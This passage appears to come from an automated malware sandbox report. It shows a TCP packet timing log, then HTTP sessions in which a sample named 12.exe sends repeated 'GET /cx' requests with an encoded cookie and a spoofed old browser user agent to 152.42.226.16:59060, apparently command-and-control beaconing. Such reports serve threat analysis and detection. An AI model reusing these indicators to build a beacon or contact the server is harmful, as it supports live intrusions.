                          Dec 26, 2024 19:31:19.896161079 CET5906050070152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:19.896222115 CET5007059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:19.896342039 CET5007059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:20.006856918 CET5007159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:20.015815973 CET5906050070152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:20.126341105 CET5906050071152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:20.126410007 CET5007159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:20.126601934 CET5007159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:20.246169090 CET5906050071152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:22.845076084 CET5906050071152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:22.845150948 CET5007159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:22.845253944 CET5007159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:22.958726883 CET5007259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:22.964870930 CET5906050071152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:23.078520060 CET5906050072152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:23.079722881 CET5007259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:23.079849958 CET5007259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:23.200109959 CET5906050072152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:25.755268097 CET5906050072152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:25.755345106 CET5007259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:25.772150040 CET5007259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:25.882299900 CET5007359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:25.891699076 CET5906050072152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:26.001961946 CET5906050073152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:26.002033949 CET5007359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:26.002208948 CET5007359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:26.122737885 CET5906050073152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:28.660767078 CET5906050073152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:28.660856962 CET5007359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:28.660974979 CET5007359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:28.772547960 CET5007459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:28.780559063 CET5906050073152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:28.893815041 CET5906050074152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:28.897706032 CET5007459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:28.897826910 CET5007459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:29.017288923 CET5906050074152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:31.559768915 CET5906050074152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:31.559824944 CET5007459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:31.559921980 CET5007459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:31.678514004 CET5007559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:31.681379080 CET5906050074152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:31.800256968 CET5906050075152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:31.800335884 CET5007559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:31.800551891 CET5007559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:31.921432018 CET5906050075152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:34.517851114 CET5906050075152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:34.521650076 CET5007559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:34.521650076 CET5007559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:34.633538961 CET5007659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:34.641894102 CET5906050075152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:34.753243923 CET5906050076152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:34.753393888 CET5007659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:34.753815889 CET5007659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:35.015242100 CET5906050076152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:37.583408117 CET5906050076152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:37.583462000 CET5007659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:37.583528042 CET5007659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:37.693984032 CET5007759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:37.703119040 CET5906050076152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:37.813515902 CET5906050077152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:37.813596010 CET5007759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:37.813818932 CET5007759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:37.935028076 CET5906050077152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:40.474548101 CET5906050077152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:40.475090027 CET5007759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:40.475234985 CET5007759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:40.585547924 CET5007859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:40.785557032 CET5007759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:41.055795908 CET5906050077152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:41.056081057 CET5906050077152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:41.056137085 CET5906050078152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:41.056149960 CET5906050077152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:41.056243896 CET5007759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:41.056267023 CET5007859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:41.056358099 CET5007759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:41.056504965 CET5007859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:41.176073074 CET5906050078152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:43.731837988 CET5906050078152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:43.731887102 CET5007859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:43.731971025 CET5007859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:43.850303888 CET5007959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:43.851541996 CET5906050078152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:43.969991922 CET5906050079152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:43.970068932 CET5007959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:43.970377922 CET5007959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:44.089889050 CET5906050079152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:46.631531954 CET5906050079152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:46.633605003 CET5007959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:46.633671045 CET5007959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:46.740775108 CET5008059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:46.753174067 CET5906050079152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:46.860582113 CET5906050080152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:46.860682011 CET5008059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:46.860937119 CET5008059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:46.980849981 CET5906050080152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:49.520464897 CET5906050080152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:49.520544052 CET5008059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:49.520590067 CET5008059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:49.631028891 CET5008159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:49.640225887 CET5906050080152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:49.750746965 CET5906050081152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:49.750819921 CET5008159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:49.751136065 CET5008159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:49.870963097 CET5906050081152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:52.411937952 CET5906050081152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:52.413722038 CET5008159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:52.413722038 CET5008159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:52.521015882 CET5008259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:52.533343077 CET5906050081152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:52.640676975 CET5906050082152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:52.640818119 CET5008259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:52.641571045 CET5008259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:52.762439966 CET5906050082152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:55.302402973 CET5906050082152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:55.302479029 CET5008259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:55.302933931 CET5008259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:55.413165092 CET5008359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:55.422420979 CET5906050082152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:55.534677982 CET5906050083152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:55.534775972 CET5008359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:55.534957886 CET5008359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:55.654504061 CET5906050083152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:58.236124039 CET5906050083152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:58.236196041 CET5008359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:58.236236095 CET5008359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:58.349260092 CET5008459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:58.356400013 CET5906050083152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:58.469794989 CET5906050084152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:58.469934940 CET5008459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:58.470114946 CET5008459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:58.589824915 CET5906050084152.42.226.16192.168.2.4
                          Dec 26, 2024 19:32:01.239901066 CET5906050084152.42.226.16192.168.2.4
                          Dec 26, 2024 19:32:01.240048885 CET5008459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:32:01.240165949 CET5008459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:32:01.349574089 CET5008559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:32:01.359796047 CET5906050084152.42.226.16192.168.2.4
                          Dec 26, 2024 19:32:01.470118999 CET5906050085152.42.226.16192.168.2.4
                          Dec 26, 2024 19:32:01.470205069 CET5008559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:32:01.470427990 CET5008559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:32:01.591388941 CET5906050085152.42.226.16192.168.2.4
                          Dec 26, 2024 19:32:04.130444050 CET5906050085152.42.226.16192.168.2.4
                          Dec 26, 2024 19:32:04.130503893 CET5008559060192.168.2.4152.42.226.16

                          HTTP Request Dependency Graph

                          • 152.42.226.16:59060

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.449730152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:27:58.501960039 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.449731152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:28:01.404603958 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.449732152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:28:04.326299906 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.449733152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:28:07.245825052 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.449734152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:28:10.171814919 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.449735152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:28:13.248894930 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.449737152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:28:16.155977964 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.449741152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:28:19.110304117 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.449743152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:28:22.092303991 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          9192.168.2.449745152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:28:25.001307964 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          10192.168.2.449746152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:28:27.889086008 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          11192.168.2.449747152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:28:30.810631990 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          12192.168.2.449748152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:28:33.727039099 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          13192.168.2.449749152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:28:36.613922119 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          14192.168.2.449750152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:28:39.532476902 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          15192.168.2.449751152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:28:42.453362942 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          16192.168.2.449752152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:28:45.440135956 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          17192.168.2.449753152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:28:48.397075891 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          18192.168.2.449754152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:28:51.315757036 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          19192.168.2.449755152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:28:54.218161106 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          20192.168.2.449758152.42.226.16590607324C:\Users\user\Desktop\12.exe
                          TimestampBytes transferredDirectionData
                          Dec 26, 2024 19:28:57.203973055 CET380OUTGET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
